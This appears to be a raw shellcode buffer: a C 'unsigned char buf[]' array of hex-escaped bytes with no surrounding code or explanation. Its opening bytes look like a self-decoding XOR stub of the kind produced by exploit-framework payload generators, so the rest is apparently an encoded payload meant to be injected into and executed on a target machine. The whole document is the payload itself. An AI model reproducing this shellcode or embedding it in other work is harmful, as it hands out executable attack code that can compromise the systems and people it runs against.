unsigned char buf[] = 
"\xdb\xc7\xbe\xdf\x8d\x50\x4f\xd9\x74\x24\xf4\x5d\x31\xc9"
"\xb1\x3d\x83\xed\xfc\x31\x75\x16\x03\x75\x16\xe2\x2a\x36"
"\x25\x9a\xa4\xca\x1d\xff\x9d\xb9\x85\xf4\x47\x71\x0f\x45"
"\x40\x44\xd5\xb4\xad\xfc\xfb\x3b\x06\xd1\x6e\x4d\xe2\x01"
"\x4c\x47\x12\x9c\x7c\x74\xae\x45\x38\x05\x01\x51\xd2\x0b"
"\xb1\xc8\x80\x4d\x95\x6f\x67\xbc\x83\x63\x8e\x81\xa6\xba"
"\x87\x39\x2d\x2f\x07\x8b\xc6\x60\xa8\x93\xbc\x5a\xa1\x71"
"\x92\x29\xee\xa2\x12\xcc\xe3\x3c\xcf\x1d\xb6\x06\xe0\x03"
"\x34\x31\x47\xfa\xc1\xdf\x24\xc4\xf2\x30\x8e\x07\xc6\x45"
"\x06\xd0\xe9\x3c\xd8\x51\x31\x24\xf0\x0f\x7c\xf9\x64\x05"
"\x70\xbf\x9d\xb5\xe0\xe1\x79\x92\xbc\x4e\xd9\x72\xe0\xaf"
"\x74\x6c\x0c\xa9\xf4\x30\xda\x1f\x45\x3d\xf9\x4b\x93\xf0"
"\x51\xbc\xc8\x09\xc4\x12\xc3\x34\x51\x0e\x7c\x1b\x7d\xd9"
"\x76\xdd\x60\x1b\x81\x0e\x09\x8c\xd4\x73\xc0\xa6\x49\xc3"
"\xa7\xe2\x5c\x53\x87\x3c\x46\x5b\x7e\xea\x2a\x2a\xdd\xf5"
"\x53\x2b\xd0\xe3\xa9\x7d\x65\x27\x56\x2d\xa0\xf0\xb4\xee"
"\x84\x4c\x58\xd8\x62\x6f\x8f\xc0\x57\xd5\xee\xea\x71\xcb"
"\x59\x06\x6a\xfc\x1e\x1c\x45\xaa\x08\xaa\x80\x31\x60\x45"
"\xb4\x58\xb5\xcb\x91\x0d\x8e\x92\x5c\x21\xfe\x3a\x7d\xca"
"\x4c\x07\x2f\xcc";
